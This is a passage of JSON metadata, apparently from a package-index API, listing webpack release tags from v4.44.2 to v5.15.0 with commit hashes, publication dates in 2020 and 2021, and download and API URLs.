7017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/w